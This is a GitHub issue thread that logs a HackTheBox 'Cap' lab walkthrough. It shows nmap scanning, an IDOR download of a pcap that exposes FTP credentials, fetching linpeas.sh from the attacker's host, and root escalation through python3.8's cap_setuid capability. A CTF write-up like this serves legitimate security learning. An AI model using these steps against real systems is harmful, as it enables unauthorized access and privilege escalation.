search

roaris / ctf-log

0 stars 0 forks source link

HackTheBox: Cap (Machine Easy) #24

Open roaris opened 8 months ago

roaris commented 8 months ago

https://app.hackthebox.com/machines/Cap

$ nmap -sC -sV -Pn 10.10.10.245
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-11 23:05 JST
Nmap scan report for 10.10.10.245
Host is up (0.51s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 fa:80:a9:b2:ca:3b:88:69:a4:28:9e:39:0d:27:d5:75 (RSA)
|   256 96:d8:f8:e3:e8:f7:71:36:c5:49:d5:9d:b6:a4:c9:0c (ECDSA)
|_  256 3f:d0:ff:91:eb:3b:f6:e1:9f:2e:8d:de:b3:de:b2:18 (ED25519)
80/tcp open  http    gunicorn
|_http-server-header: gunicorn
|_http-title: Security Dashboard
| fingerprint-strings:
|   FourOhFourRequest:
|     HTTP/1.0 404 NOT FOUND
|     Server: gunicorn
|     Date: Mon, 11 Mar 2024 14:06:58 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 232
|     <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
|     <title>404 Not Found</title>
|     <h1>Not Found</h1>
|     <p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>
|   GetRequest:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 11 Mar 2024 14:06:49 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 19386
|     <!DOCTYPE html>
|     <html class="no-js" lang="en">
|     <head>
|     <meta charset="utf-8">
|     <meta http-equiv="x-ua-compatible" content="ie=edge">
|     <title>Security Dashboard</title>
|     <meta name="viewport" content="width=device-width, initial-scale=1">
|     <link rel="shortcut icon" type="image/png" href="/static/images/icon/favicon.ico">
|     <link rel="stylesheet" href="/static/css/bootstrap.min.css">
|     <link rel="stylesheet" href="/static/css/font-awesome.min.css">
|     <link rel="stylesheet" href="/static/css/themify-icons.css">
|     <link rel="stylesheet" href="/static/css/metisMenu.css">
|     <link rel="stylesheet" href="/static/css/owl.carousel.min.css">
|     <link rel="stylesheet" href="/static/css/slicknav.min.css">
|     <!-- amchar
|   HTTPOptions:
|     HTTP/1.0 200 OK
|     Server: gunicorn
|     Date: Mon, 11 Mar 2024 14:06:50 GMT
|     Connection: close
|     Content-Type: text/html; charset=utf-8
|     Allow: GET, OPTIONS, HEAD
|     Content-Length: 0
|   RTSPRequest:
|     HTTP/1.1 400 Bad Request
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 196
|     <html>
|     <head>
|     <title>Bad Request</title>
|     </head>
|     <body>
|     <h1><p>Bad Request</p></h1>
|     Invalid HTTP Version &#x27;Invalid HTTP Version: &#x27;RTSP/1.0&#x27;&#x27;
|     </body>
|_    </html>
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port80-TCP:V=7.94SVN%I=7%D=3/11%Time=65EF0FF6%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,2A0C,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\
SF:x20Mon,\x2011\x20Mar\x202024\x2014:06:49\x20GMT\r\nConnection:\x20close
SF:\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x20
SF:19386\r\n\r\n<!DOCTYPE\x20html>\n<html\x20class=\"no-js\"\x20lang=\"en\
SF:">\n\n<head>\n\x20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20
SF:\x20<meta\x20http-equiv=\"x-ua-compatible\"\x20content=\"ie=edge\">\n\x
SF:20\x20\x20\x20<title>Security\x20Dashboard</title>\n\x20\x20\x20\x20<me
SF:ta\x20name=\"viewport\"\x20content=\"width=device-width,\x20initial-sca
SF:le=1\">\n\x20\x20\x20\x20<link\x20rel=\"shortcut\x20icon\"\x20type=\"im
SF:age/png\"\x20href=\"/static/images/icon/favicon\.ico\">\n\x20\x20\x20\x
SF:20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/bootstrap\.min\.css
SF:\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/
SF:font-awesome\.min\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\
SF:x20href=\"/static/css/themify-icons\.css\">\n\x20\x20\x20\x20<link\x20r
SF:el=\"stylesheet\"\x20href=\"/static/css/metisMenu\.css\">\n\x20\x20\x20
SF:\x20<link\x20rel=\"stylesheet\"\x20href=\"/static/css/owl\.carousel\.mi
SF:n\.css\">\n\x20\x20\x20\x20<link\x20rel=\"stylesheet\"\x20href=\"/stati
SF:c/css/slicknav\.min\.css\">\n\x20\x20\x20\x20<!--\x20amchar")%r(HTTPOpt
SF:ions,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Mon,
SF:\x2011\x20Mar\x202024\x2014:06:50\x20GMT\r\nConnection:\x20close\r\nCon
SF:tent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20GET,\x20OPTIONS,
SF:\x20HEAD\r\nContent-Length:\x200\r\n\r\n")%r(RTSPRequest,121,"HTTP/1\.1
SF:\x20400\x20Bad\x20Request\r\nConnection:\x20close\r\nContent-Type:\x20t
SF:ext/html\r\nContent-Length:\x20196\r\n\r\n<html>\n\x20\x20<head>\n\x20\
SF:x20\x20\x20<title>Bad\x20Request</title>\n\x20\x20</head>\n\x20\x20<bod
SF:y>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p></h1>\n\x20\x20\x20\x20Inv
SF:alid\x20HTTP\x20Version\x20&#x27;Invalid\x20HTTP\x20Version:\x20&#x27;R
SF:TSP/1\.0&#x27;&#x27;\n\x20\x20</body>\n</html>\n")%r(FourOhFourRequest,
SF:189,"HTTP/1\.0\x20404\x20NOT\x20FOUND\r\nServer:\x20gunicorn\r\nDate:\x
SF:20Mon,\x2011\x20Mar\x202024\x2014:06:58\x20GMT\r\nConnection:\x20close\
SF:r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Length:\x202
SF:32\r\n\r\n<!DOCTYPE\x20HTML\x20PUBLIC\x20\"-//W3C//DTD\x20HTML\x203\.2\
SF:x20Final//EN\">\n<title>404\x20Not\x20Found</title>\n<h1>Not\x20Found</
SF:h1>\n<p>The\x20requested\x20URL\x20was\x20not\x20found\x20on\x20the\x20
SF:server\.\x20If\x20you\x20entered\x20the\x20URL\x20manually\x20please\x2
SF:0check\x20your\x20spelling\x20and\x20try\x20again\.</p>\n");
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 201.55 seconds

OpenSSH 8.2p1のpはportableのpらしい https://qiita.com/t_nakayama0714/items/c312bc5edcce6c214856#openssh

roaris commented 8 months ago

ポート80を確認すると、ネットワークのプロファイラみたいなアプリケーションが出てきた

ColorlibというWordPressのテーマが使われているらしい

Security Snapshotをクリックすると、pcapファイルがダウンロード出来るが、直近のパケットしか含まれていないので、Wiresharkで確認しても、FTPのID/PASSが手に入るとかはない

roaris commented 8 months ago

vsftpd 3.0.3, OpenSSH 8.2p1の脆弱性を調べたけど、使えそうなのが無かった gobusterもしたけど、特になし

roaris commented 8 months ago

Downloadボタンに着目するらしい onclick="location.href='/download/3'"となっている

image

GET /download/3のリクエストを送ると、Content-Typeがapplication/vnd.tcpdump.pcapのレスポンスが返ってくる

image

未知のContent-Typeが指定されていた場合、ブラウザはそのファイルをダウンロードするようになっている https://qiita.com/yutoo89/items/c59a6a920b1bd6a72d59

roaris commented 8 months ago

ブラウザで/download/0にアクセスすると、0.pcapをダウンロードすることが出来る 0.pcapをWiresharkで確認すると、FTPのID/PASSがnathan/Buck3tH4TF0RM3!だと分かる

image

roaris commented 8 months ago

上で得た認証情報でFTPにログインすると、user.txtが見つかる

$ ftp 10.10.10.245
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:roaris): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
229 Entering Extended Passive Mode (|||27892|)
150 Here comes the directory listing.
-r--------    1 1001     1001           33 Mar 11 14:37 user.txt
226 Directory send OK.
ftp> get user.txt
local: user.txt remote: user.txt
229 Entering Extended Passive Mode (|||46821|)
150 Opening BINARY mode data connection for user.txt (33 bytes).
100% |*******************************************************************************************************************************|    33        0.18 KiB/s    00:00 ETA
226 Transfer complete.
33 bytes received in 00:00 (0.04 KiB/s)
ftp> exit
221 Goodbye.
roaris commented 8 months ago

/rootにはアクセス出来ない

ftp> pwd
Remote directory: /home/nathan
ftp> cd ../..
250 Directory successfully changed.
ftp> dir
229 Entering Extended Passive Mode (|||10566|)
150 Here comes the directory listing.
lrwxrwxrwx    1 0        0               7 Jul 31  2020 bin -> usr/bin
drwxr-xr-x    4 0        0            4096 Jul 23  2021 boot
drwxr-xr-x    2 0        0            4096 May 23  2021 cdrom
drwxr-xr-x   18 0        0            4000 Mar 11 14:37 dev
drwxr-xr-x   92 0        0            4096 Jul 23  2021 etc
drwxr-xr-x    3 0        0            4096 May 23  2021 home
lrwxrwxrwx    1 0        0               7 Jul 31  2020 lib -> usr/lib
lrwxrwxrwx    1 0        0               9 Jul 31  2020 lib32 -> usr/lib32
lrwxrwxrwx    1 0        0               9 Jul 31  2020 lib64 -> usr/lib64
lrwxrwxrwx    1 0        0              10 Jul 31  2020 libx32 -> usr/libx32
drwx------    2 0        0           16384 Sep 23  2020 lost+found
drwxr-xr-x    2 0        0            4096 Jun 01  2021 media
drwxr-xr-x    2 0        0            4096 May 23  2021 mnt
drwxr-xr-x    2 0        0            4096 May 23  2021 opt
dr-xr-xr-x  264 0        0               0 Mar 11 14:37 proc
drwx------    6 0        0            4096 Mar 11 14:37 root
drwxr-xr-x   27 0        0             800 Mar 11 14:37 run
lrwxrwxrwx    1 0        0               8 Jul 31  2020 sbin -> usr/sbin
drwxr-xr-x    6 0        0            4096 May 23  2021 snap
drwxr-xr-x    3 0        0            4096 May 23  2021 srv
dr-xr-xr-x   13 0        0               0 Mar 11 14:37 sys
drwxrwxrwt   12 0        0            4096 Mar 11 15:24 tmp
drwxr-xr-x   15 0        0            4096 May 23  2021 usr
drwxr-xr-x   14 0        0            4096 May 23  2021 var
226 Directory send OK.
ftp> cd root
550 Failed to change directory.
roaris commented 8 months ago

SSHはパスワード認証が有効になっていて、nathan/Buck3tH4TF0RM3!でログイン出来るらしい sudo -lは出来ない

$ ssh nathan@10.10.10.245
The authenticity of host '10.10.10.245 (10.10.10.245)' can't be established.
ED25519 key fingerprint is SHA256:UDhIJpylePItP3qjtVVU+GnSyAZSr+mZKHzRoKcmLUI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.245' (ED25519) to the list of known hosts.
nathan@10.10.10.245's password:
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon Mar 11 15:39:56 UTC 2024

  System load:           0.0
  Usage of /:            36.6% of 8.73GB
  Memory usage:          21%
  Swap usage:            0%
  Processes:             225
  Users logged in:       0
  IPv4 address for eth0: 10.10.10.245
  IPv6 address for eth0: dead:beef::250:56ff:feb9:ca45

  => There are 2 zombie processes.

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

63 updates can be applied immediately.
42 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable

The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Thu May 27 11:21:27 2021 from 10.10.14.7
nathan@cap:~$ sudo -l
[sudo] password for nathan:
Sorry, user nathan may not run sudo on cap.
roaris commented 8 months ago

LinPEASを使うらしい マシン側ではlinpeas.shをインストール出来なかった

nathan@cap:~$ wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
--2024-03-11 15:43:01--  https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh
Resolving github.com (github.com)... failed: Temporary failure in name resolution.
wget: unable to resolve host address ‘github.com’

なので、kali linux側でlinpeas.shをインストールして、python -m http.server 8000でマシン側に共有させる

nathan@cap:~$ wget 10.10.16.5:8000/linpeas.sh
--2024-03-11 15:49:03--  http://10.10.16.5:8000/linpeas.sh
Connecting to 10.10.16.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 860549 (840K) [text/x-sh]
Saving to: ‘linpeas.sh’

linpeas.sh                                 100%[========================================================================================>] 840.38K   688KB/s    in 1.2s

2024-03-11 15:49:05 (688 KB/s) - ‘linpeas.sh’ saved [860549/860549]

nathan@cap:~$ ls
linpeas.sh  user.txt
nathan@cap:~$ chmod +x linpeas.sh
roaris commented 8 months ago

WinPEAS同様に出力の量が多すぎる

ここに着目するらしい

Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
/usr/bin/ping = cap_net_raw+ep
/usr/bin/traceroute6.iputils = cap_net_raw+ep
/usr/bin/mtr-packet = cap_net_raw+ep
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep

/usr/bin/python3.8にcap_setuidがあることが重要らしい Linuxにはcapabilityというものがあるらしい https://qiita.com/Brutus/items/37d942214b4c6edd08df capabilityはgetcapコマンドで確認できる

nathan@cap:~$ getcap /usr/bin/python3.8
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip

setuidはプロセスの実行ユーザのIDを変更するもの https://man7.org/linux/man-pages/man2/setuid.2.html cap_setuidはsetuidを行う権限があるという意味

roaris commented 8 months ago

/usr/bin/python3.8を起動し、uidを0に変更してからbashを起動することで、rootユーザのシェルが得られる

nathan@cap:~$ /usr/bin/python3.8
Python 3.8.5 (default, Jan 27 2021, 15:41:15)
[GCC 9.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
root@cap:~# id
uid=0(root) gid=1001(nathan) groups=1001(nathan)
root@cap:~# cd /root
root@cap:/root# ls
root.txt  snap